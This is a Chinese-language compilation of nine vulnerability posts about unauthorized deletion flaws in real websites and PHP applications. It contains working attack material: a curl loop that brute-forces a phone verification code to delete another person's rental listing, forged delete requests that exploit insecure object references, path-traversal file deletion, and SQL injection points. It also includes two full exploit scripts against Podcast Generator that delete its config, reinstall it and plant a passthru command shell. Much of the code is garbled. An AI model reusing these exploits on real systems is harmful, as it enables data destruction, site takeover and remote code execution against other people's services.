“connienorman”通过精心收集,向本站投稿了9篇搜房网任意删除租房信息,下面是小编帮大家整理后的搜房网任意删除租房信息,欢迎阅读,希望大家能够喜欢。
篇1:搜房网任意删除租房信息
过年回来找房子,不小心看到的,
球内部信息帮找下房子啊
搜房网任意删除租房信息(算漏洞还是风险)
删贴的时候要验证手机验证码,然后写一个循环遍历下验证码就删掉了。
seq 10000 99999 | while read p;do curl -A 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/0101 Firefox/19.0' -e 'zu.soufun.com/rent/backstage/InputFront/PhoneProcess.aspx' -d '__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzUxNzIxODc0ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUGSW1hZ2Uxn9aH0fydXNWryA%2B0jOw13RDA1Mk%3D&__EVENTVALIDATION=%2FwEWCAL8%2F%2Fa1BwKzmc2yBwLf2eqGAwKpsOHOAQK2%2FNLkBwLWpurMDQK3idb8DgL3iuuZCO5r4Ut%2B7sxrQ0woG%2FwXGKlACqdS&Image1.x=19&Image1.y=21&HHouseID=57347075&HType=del&HPhone=13810016519&HUserName=anonymous13810016519&Hhousetypeprocess=&code='“$p” 'zu.soufun.com/rent/backstage/InputFront/PhoneProcess.aspx';done
zu.soufun.com/chuzu/1_57347075_-1.htm
这是删除前的页面
1.
删除后直接显示房源不存在
修复方案:
因为验证码是6位的,跑出来可能要点时间,但是也不是特别多吧,反正我一下就删掉了
篇2:爱丽网越权之任意用户信息删除
1.注册两枚用户,各发布一条信息;
2.点击删除一个用户发布的信息,抓包得到如下数据;
POST /index.php HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: show.aili.com/index.php?m=member&s=2
Content-Length: 48
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
m=content&c=index&a=delcontent&contentid=7368892
3.我们获取另一个用户发布的信息ID;
4.把上面contentid值替换成“7368894”并提交,之后返回该用户页面刷新,发布的信息被成功删除;
PS:我们注意到contentid值是很有规律的,所以攻击者可使用burpsuite大量提交请求,可删除用户用户发布的信息!!
修复方案:
严格校验用户身份
篇3:强制删除任意文件以及文件夹
DEL /F /A /Q ?%1
RD /S /Q ?%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹
,
篇4:记事狗任意文件删除漏洞预警
利用条件:
1.仅限于windows主机,linux无效(至少我本机就不行)
2.已注册用户
3.需要删除的文件可读写
在modules/ajax/event.mod.php中
www.xxxx.com
#保护性删除图片
function doUnlink($pic){
if(!$pic) return false;
0 = trim(strtolower(end(explode(“.”,$pic))));
$exp = '././images/event/[0-9]{10}'.MEMBER_ID.'_b.'.0;
if(ereg($exp,$pic)){
unlink($pic);
unlink(strtr($pic,'_b.','_s.'));
return true;
}else {
return false;
}
}
该函数在 onloadPic中被调用
if($_FILES['pic']['name']){
//省略.....................
$hid_pic = $this->Post['hid_pic'];
$eid = (int) $this->Post['id'];
$this->doUnlink($hid_pic,$eid);
//省略.............
}
只要$_FILES['pic']['name'] 不为空,然后我们就可以构造hid_pic了
hid_pic 的内容为:
././images/event/1234567890{MEMBER_ID}_b.{你要删除的文件的后缀}/../../../{你要删除的文件}
比如我们要删除./data/install.lock文件,而且我的MEMBER_ID为2 则:
././images/event/12345678902_b.lock/../../../data/install.lock
本地测试成功
实际利用:
在 index.php?mod=event&code=pevent
上传抓包,然后在hid_pic底下填写././images/event/12345678902_b.lock/../../../data/install.lock 即可
修复方案:
do it yourself
篇5:强制删除任意文件以及文件夹漏洞预警
DEL /F /A /Q ?%1
RD /S /Q ?%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹漏洞预警
,
篇6:中粮我买网越权操作缺陷(删除/修改任意用户信息)
之前提交中粮我买网删除任意用户信息任意用户地址信息删除,我也没有验证是否修复,不过找到了另外一个借口,可完成同样的操作。
找你们的洞真不容易呀~~~
-------------------------------
一、任意用户地址删除
1·用户1 添加收货地址
同时审查元素看到此地址value=4799777,当然啦,这个就是要被消灭的对象了。
2·用户2登陆,正常购物,在提交订单的时候,有个接口对用户的地址信息进行操作。
做删除操作时候抓包或者httpreplay 一下
success! 回来看用户1的地址簿
bingo!
二、任意用户地址修改
1·用户1添加地址id=4799785
可以留意一下收货人名称和电话号码信息,
2·在与上面同样的接口处
提交对地址信息的修改
3·
修改其中的收货人名称和电话号码信息。replay
4·效果
bingo!
修复方案:
两处越权
是不是分数高一些呢~~~
篇7:Podcast Generator多个模块文件包含和任意文件删除漏洞
影响版本:
Podcast Generator 1.2
程序介绍:
Podcast Generator是用PHP编写的免费播客发布脚本,
漏洞分析:
Podcast Generator的core/archive_cat.php、core/admin/itunescategories.php和core /admin/login.php页面没有正确地过滤对GLOBALS[absoluteurl]参数所传送的输入,core/themes.php页面没有正确地过滤对GLOBALS[theme_path]参数所传送的输入,这可能用于包含本地或外部资源的任意文件;此外core/admin /delete.php页面没有正确地过滤对file和ext“参数所传送的输入,可能导致删除任意文件。成功利用这些漏洞要求打开了 register_globals。
漏洞利用:
#
# Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit
#
# by staker
# --------------------------------------
# mail: staker[at]hotmail[dot]it
# url: podcastgen.sourceforge.net
# --------------------------------------
#
# it works with register_globals=on
#
# short explanation:
#
# ----------------------------------------
# Podcast Generator contains one flaw that
# allows an attacker to re-install the cms
# because of unlink in'delete.php'file
# ----------------------------------------
# Look at'/core/admin/delete.php'
# (removed author's comments)
/*
if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path']))
{ exit; } <-------- {1}
if ($amilogged != ”true“) { exit; } <-------{2}
if (isset($_GET['file']) AND $_GET['file']!=NULL) {
$file = $_GET['file'];
$ext = $_GET['ext'];
if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {
unlink (”$upload_dir$file.$ext“); <--------{3}
$PG_mainbody .=”
$file.$ext$L_deleted
“;
}
*/
#
# Explanation (code snippet above [points])
# -----------------------------------------------------------------------------------
# 1. blocks all'amilogged'REQUEST variables,what about GLOBALS?,therefore useless!
# 2.if'amilogged'isn't true ->exit()functionactivated.
# 3. unlink()deletean existing file.
# -----------------------------------------------------------------------------------
#
# It's possible to delete 'config.php' to re-install the cms. we need 'amilogged'
# set to true. We candoit using a GLOBALS variable.
#
# admin/core/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php
#
# Various:
# --------------------------------------------------
# They didn't help me but i want to give a thanks to
# girex,skerno,Chaomel,XaDoS,Dante90andGianluka_95
# --------------------------------------------------
# Today is: 02 June .
# Location: Italy,Turin.
# www. .com/watch?v=dBc7mK5iAH0
# --------------------------------------------------
error_reporting(E_STRICT ^ E_WARNING);
if($argc< 2) start_usage();
$host=$argv[1];
$path=$argv[2];
re_install();
functionsend_request($data)
{
global$host;
if(!$sock= @fsockopen($host,80)) {
die(”connection refused..n“);
}
if(isset($data)) {
fputs($sock,$data);
}
while(!feof($sock)) {$result.=fgets($sock); }
fclose($sock);
return$result;
}
functionremove_config()
{
global$host,$path;
$in_lex=”/{$path}/core/admin/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php“;
$config=”GET {$in_lex} HTTP/1.1rn“;
$config.=”User-Agent: Lynx (textmode)rn“;
$config.=”Host: {$host}rn“;
$config.=”Connection: closernrn“;
$lol= send_request($config);
if(check_config() != FALSE) {
die(”register_globals=off, exploit failed!n“);
}
else{
returntrue;
}
}
functionre_install()
{
global$host,$path;
$binary=”username=staker&password=killingyourself&password2=killingyourself&setuplanguage=en“;
$config=”POST {$path}/setup/index.php?step=5 HTTP/1.1rn“;
$config.=”User-Agent: Lynx (textmode)rn“;
$config.=”Host: {$host}rn“;
$config.=”Content-Type: application/x-www-form-urlencodedrn“;
$config.=”Content-Length: “.strlen($binary).”rn“;
$config.=”Connection: closernrn“;
$config.=$binary;
remove_config();
$content= send_request($config);
if(eregi('Creation of the configuration file',$content)) {
echo”[ re-installed successfuln“;
echo”[ username: stakern[ password: killingyourselfn“;exit(0);
}
else{
die(”Exploit failedn“);
}
}
functioncheck_config()
{
global$host,$path;
$config=”GET /{$path}/config.php HTTP/1.1rn“;
$config.=”User-Agent: Lynx (textmode)rn“;
$config.=”Host: {$host}rn“;
$config.=”Connection: closernrn“;
$content= send_request($config);
if(ereg('HTTP/1.1 404 Not Found',$content)) {
returnfalse;
}
else{
returntrue;
}
}
functionstart_usage()
{
print”[*--------------------------------------------------------------------------*]n“.
”[* Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit *]n“.
”[*--------------------------------------------------------------------------*]n“.
”[* Usage: php podcast_xpl.php [host] [path] *]n“.
”[* [host] host -> example: localhost *]n“.
”[* [path] path -> example: /podcast *]n“.
”[*--------------------------------------------------------------------------*]n“;
die();
}
#!/usr/bin/php -q -d short_open_tag=on
echo”
Podcast Generator <= 1.1 Remote Code Execution
Vendor: podcastgen.sourceforge.net
Exploit Author: BlackHawk
Author's Site: itablackhawk.altervista.org
Credits goes to RGodforthe code
Thanks to Marija justforexist :)
“;
if($argc<4) {
echo”
Usage: php“.$argv[0].”host /path/ command
Es: php“.$argv[0].”localhost / dir
“;
die;
}
/*
Bugs explanation:
This app has tons of bugs, but because of his structure lot of them are useless.. but not them all!
Look at 'core/admin/delete.php' (i have omitted the author comments):
---------------------------
if (isset($_REQUEST['absoluteurl']) OR isset($_REQUEST['amilogged']) OR isset($_REQUEST['theme_path'])) { exit; }
if (isset($_GET['file']) AND $_GET['file']!=NULL) {
$file = $_GET['file'];
$ext = $_GET['ext'];
if (file_exists(”$absoluteurl$upload_dir$file.$ext“)) {
unlink (”$upload_dir$file.$ext“);
$PG_mainbody .=”
$file.$ext$L_deleted
“;
}
---------------------------
no check for admin rights, so now we can delete whatever file we want, with any exstension..
so let's delete config.php and make a rfesh new installation with a password set by us!
the RCE is triggered in 'core/admin/scriptconfig.php', line 56:
---------------------------
// recent in home
$recent = $_POST['recent'];
if ($recent != ”“) {
$max_recent = $recent;
}
---------------------------
no sanitize of the input and no quotes added when writting to the config file (so no need mq=off)
BlackHawk
*/
error_reporting(0);
ini_set(”max_execution_time“,0);
ini_set(”default_socket_timeout“,5);
functionquick_dump($string)
{
$result='';$exa='';$cont=0;
for($i=0;$i<=strlen($string)-1;$i++)
{
if((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=” .“;}
else
{$result.=” “.$string[$i];}
if(strlen(dechex(ord($string[$i])))==2)
{$exa.=” “.dechex(ord($string[$i]));}
else
{$exa.=” 0“.dechex(ord($string[$i]));}
$cont++;if($cont==15) {$cont=0;$result.=”rn“;$exa.=”rn“;}
}
return$exa.”rn“.$result;
}
$proxy_regex='(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
functionsendpacketii($packet)
{
global$proxy,$host,$port,$html,$proxy_regex;
if($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if(!$ock) {
echo'No response from '.$host.':'.$port;die;
}
}
else{
$c= preg_match($proxy_regex,$proxy);
if(!$c) {
echo'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo”Connecting to “.$parts[0].”:“.$parts[1].” proxy...rn“;
$ock=fsockopen($parts[0],$parts[1]);
if(!$ock) {
echo'No response from proxy...';die;
}
}
fputs($ock,$packet);
if($proxy=='') {
$html='';
while(!feof($ock)) {
$html.=fgets($ock);
}
}
else{
$html='';
while((!feof($ock))or(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd=”“;
for($i=3;$i<=$argc-1;$i++){
$cmd.=” “.$argv[$i];
}
$port=80;
$proxy=”“;
if(($path[0]'/')or($path[strlen($path)-1]'/')) {echo'Error... check the path!';die;}
if($proxy=='') {$p=$path;}else{$p=''.$host.':'.$port.$path;}
echo”Step1 - Delete config.incrn“;
$packet=”GET “.$p.”core/admin/delete.php?file=../../config&ext=php HTTP/1.0rn“;
$packet.=”Host: “.$host.”rn“;
$packet.=”Connection: Closernrn“;
sendpacketii($packet);
echo”Step2 - Creating new configurationrn“;
$data=”username=new_user_name&password=blackhawk&password2=blackhawk&setuplanguage=en“;
$packet=”POST “.$p.”/setup/index.php?step=5 HTTP/1.0rn“;
$packet.=”Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn“;
$packet.=”Accept-Language: itrn“;
$packet.=”Content-Type: application/x-www-form-urlencodedrn“;
$packet.=”Accept-Encoding: gzip, deflatern“;
$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn“;
$packet.=”Host: “.$host.”rn“;
$packet.=”Content-Length: “.strlen($data).”rn“;
$packet.=”Connection: Closern“;
$packet.=”Cache-Control: no-cachernrn“;
$packet.=$data;
sendpacketii($packet);
echo”Step3 - Logging inrn“;
$data=”user=new_user_name&password=blackhawk“;
$packet=”POST “.$p.”?p=admin HTTP/1.0rn“;
$packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*rn“;
$packet.=”Accept-Language: itrn“;
$packet.=”Content-Type: application/x-www-form-urlencodedrn“;
$packet.=”Accept-Encoding: gzip, deflatern“;
$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn“;
$packet.=”Host: “.$host.”rn“;
$packet.=”Content-Length: “.strlen($data).”rn“;
$packet.=”Connection: Closern“;
$packet.=”Cache-Control: no-cachernrn“;
$packet.=$data;
sendpacketii($packet);
$temp=explode(”Set-Cookie: “,$html);
$temp2=explode(” “,$temp[1]);
$PHPid=$temp2[0];
echo”Step4 - Sending shellrn“;
$data=”streaming=yes&fbox=yes&cats=yes&newsinadmin=yes&strictfilename=yes&recent=5; if (isset($_GET[cmd])){if(get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}echo 666999;passthru($_GET[cmd]);echo 666999;}$xyz=5&recentinfeed=All&selectdateformat=d-m-Y&scriptlanguage=en“;
$packet=”POST “.$p.”?do=config&p=admin&action=change HTTP/1.0rn“;
$packet.=”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*rn“;
$packet.=”Accept-Language: itrn“;
$packet.=”Content-Type: application/x-www-form-urlencodedrn“;
$packet.=”Accept-Encoding: gzip, deflatern“;
$packet.=”User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)rn“;
$packet.=”Host: “.$host.”rn“;
$packet.=”Cookie: $PHPidrn“;
$packet.=”Content-Length: “.strlen($data).”rn“;
$packet.=”Connection: Closern“;
$packet.=”Cache-Control: no-cachernrn“;
$packet.=$data;
sendpacketii($packet);
echo”Step5 - Executing Commandrnrn“;
$packet=”GET “.$p.”config.php?cmd=dir HTTP/1.0rn“;
$packet.=”Host: “.$host.”rn“;
$packet.=”Connection: Closernrn“;
$packet.=$data;
sendpacketii($packet);
if(strstr($html,”666999“))
{
echo”Exploit succeeded...rn“;
$temp=explode(”666999“,$html);
die(”rn“.$temp[1].”rn“);
}
?>
解决方案:
厂商补丁:
Alberto Betella
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
podcastgen.sourceforge.net/download.php?lang=en
链接:secunia.com/advisories/35333/
milw0rm.com/exploits/8860
*>
篇8:记事狗删除任意访谈嘉宾漏洞预警
简要描述:
再来一个未授权的任意删除,。估计还有我就不给你们找了,举一反三你们自己找去啊。
详细说明:
文件
modules/ajax/item.mod.php 行133
function Del()
{
$id = (int)$this->Post['id'];
if($id > 0) {
DB::Query(”DELETE FROM `“.DB::table('item_user').”` WHERE iid ='$id'“);
}
}
只要在登录状态下就可以删除item_user 表任意记录(这个表保持的是访谈嘉宾)
漏洞证明:
向这个地址
t.jishigou.net/ajax.php?mod=item&code=del
post id=xx 就可以del了
测试不小心删除了2个 不好意思啊
修复方案:
权限检查,
。未授权的地方应该还不少。
篇9:iwebsns1.0 任意文件删除&&2个注入漏洞预警
actionusersuser_ico_cut_save.action.php
1
2//引入模块公共方法文件
3require(”foundation/module_users.php“);
4require(”foundation/aintegral.php“);
5require(”foundation/fcontent_format.php“);
6require(”api/base_support.php“);
7//语言包引
8$u_langpackage=new userslp;
9//数据库操作
10dbtarget('w',$dbServs);
11$dbo=new dbex();
12$photo_url=short_check(get_argg('pic')); //这里这里.
13$user_id=get_sess_userid();//用户ID
14$user_name=get_sess_username();//用户名
15$ico_url=long_check(get_argp('u_ico_url'));
16往下看
17;
18;
19;
20
21if(preg_match(”/uploadfiles/photo_store/“,$photo_url)){
22unlink($photo_url);//删除临时图片文件 // you know
iwebsnsactionpollpoll_submit.action.php
1//变量声明区
2$user_id=get_sess_userid();
3$user_name=get_sess_username();
4$userico=get_sess_userico();
5$cho=get_argp('pol_cho'); //此处可控未过滤
6$pid=intval(get_argg('pid'));
7$anon=short_check(get_argp('anonymity'));
8$total_credit=intval(get_argp('credit'));
9$per_int=intval(get_argp('percredit'));
10$p_subject=short_check(get_argp('subject')); 往下看
11foreach($cho as $v){
12$option.=”,“.$v;
13}
14$sql=”select `option` from $t_polloption where oid in(0.$option)“; //you know too
actionusersuser_info.action
1
2require(”foundation/module_users.php“);
3//引入语言包
4$u_langpackage=new userslp;
5//变量获得
6$user_id =get_sess_userid();
7$model = short_check(get_argg('model'));
8$birth_year = short_check(get_argp('birth_year'));
9$birth_month = short_check(get_argp('birth_month'));
10$birth_day = short_check(get_argp('birth_day'));
11$reside_city = short_check(get_argp('reside_city'));
12$reside_province = short_check(get_argp('reside_province'));
13$birth_city = short_check(get_argp('birth_city'));
14$birth_province = short_check(get_argp('birth_province'));
15$is_finish=intval(get_argg('is_finish'));
16$info = get_argp('info'); //看这里
17往下看
18//更新自定义信息表
19if(!empty($info)){
20foreach($info as $key => $value){
21if($value!==''){
22$key=explode('|',$key);
23$sql=”insert into $t_user_info (user_id,info_id,info_value) values ($user_id,'“.$key[0].”','$value')";//直接查询, 不过受Gpc
24$dbo -> exeUpdate($sql);
25}
26}
27}
